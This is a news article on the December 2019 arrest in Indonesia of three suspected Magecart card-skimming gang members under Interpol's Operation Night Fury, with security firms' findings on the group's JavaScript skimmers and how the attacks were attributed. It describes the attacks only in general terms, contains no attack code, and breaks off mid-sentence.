Indonesia: Magecart hackers arrested


Police Bust 3 Suspected Magecart Hackers in Indonesia

Police Bust 3 Suspected Magecart Hackers in Indonesia

Operation 'Night Fury' Targets JavaScript Skimming Gangs Hitting E-Commerce Sites

Mathew J. Schwartz
January 27, 2020

Police in Indonesia have arrested three suspected members of an e-commerce hacking crew that employed JavaScript attack code to steal customer and payment card data. The gang allegedly injected malicious JavaScript "skimming" code known as "GetBilling" into targeted websites, in what is often more broadly referred to as Magecart-type attacks.

The suspects were arrested as part of Operation Night Fury, an ongoing anti-skimming probe spearheaded by Interpol's Cyber Capability Desk, backed by U.S. and European law enforcement agencies, which has also involved Indonesia's "Bareskrim Polri" cyber police team. Interpol says another five Association of Southeast Asian Nations have received attack intelligence and are continuing to pursue Night Fury investigations.

Police have only released the three Indonesian suspects' initials and ages - "ANF," 27; "K," 35; "N," 23 - and said they were arrested in two regions in the country: Yogyakarta and Jakarta. Police said they also seized PCs and laptops, mobile phones, ATM cards, identification cards, and BCA - for Bank Central Asia - security tokens.

All three of the men have been charged with violating article 363 of the Indonesian Criminal Code by stealing electronic data; they face a maximum prison sentence of 10 years.

"The suspects have managed to infect hundreds of e-commerce websites in various locations, including in Indonesia, Australia, the United Kingdom, the United States, Germany, Brazil and some other countries," says Singapore-based cybersecurity firm Group-IB, which assisted with the investigation. "Payment and personal data of thousands of online shoppers from Asia, Europe, and the Americas have been stolen."

Investigators have accused the suspects of using stolen payment card data "to buy goods, such as electronic devices or other luxury items, which they tried to resell online in Indonesia at below the market price," Group-IB says.

While investigators have identified nearly 200 websites that the group hacked, Group-IB says that figure seems set to rise as the other five ASEAN countries continue their investigations.

Magecart Attacks Continue
Crime groups surreptitiously inject rogue JavaScript code onto e-commerce sites to intercept payment card and customer data, in what are often known as Magecart attacks. Magecart isn't a stand-alone crime group, but rather an umbrella term that refers to the use of malicious JavaScript sniffing code, aka JS sniffers or virtual skimming code (see: Magecart Group Continues Targeting E-Commerce Sites).

Security firms are tracking at least 12 different Magecart criminal groups, and they say such attacks date from 2014. But since 2018, the quantity of Magecart attacks has surged. Victims of Magecart-associated groups have included shoe manufacturer Fila, bedding sites and, as well as British Airways, Ticketmaster and Newegg.

In a 2019 report, Group-IB said it counted 38 JS-sniffer families, but the company said this week that the figure has nearly doubled since then.

More Suspects at Large
The suspects were arrested on Dec. 20, 2019.

One suspect subsequently admitted in an interview on Indonesian television that he'd been intercepting card payments since 2017. But he claimed to have made almost no revenue, earning only enough to "buy a jacket," Amsterdam-based e-commerce security firm Sanguine Security says in a blog post.

The arrests do not appear to have fully disrupted the gang's activities, Sanguine Security says, noting it continued to see attack activity using the same infrastructure afterwards, until as recently as Jan. 15.

"One or more suspects [are] still at large," tweets Dutch security researcher Willem de Groot, a digital forensics specialist at Sanguine Security. "Several card collection servers - such as - have been active and were modified since the arrests" on Dec. 20, 2019.

Overall, Sanguine Security says it has tied 571 different hack attacks to the same individuals. "These hacks could be attributed because of an odd message that was left in all of the skimming code: 'Success gan!'" The firm says that phrase "translates to 'success bro' in Indonesian and has been present for years on all of their skimming infrastructure."

The security firm says attack domains that it has traced to this crime group have included: - or "delicious" - referring to a cafeteria on the island of Borneo

Sanguine Security says at least 17 websites remain infected with the group's attack code.

Indonesian Attack Infrastructure
Group-IB says that some of the attackers' infrastructure was located in Indonesia, although the crime gang tried to hide that fact.

"To access their servers for stolen data collection and their JS-sniffers' control, they always used a VPN to hide their real location and identity," Group-IB says. "To pay for hosting services and buy new domains the gang members only used stolen cards. Despite that, Indonesian cyber police in cooperation with Interpol and Group-IB's cyber investigations team managed to establish that the group was operating from Indonesia....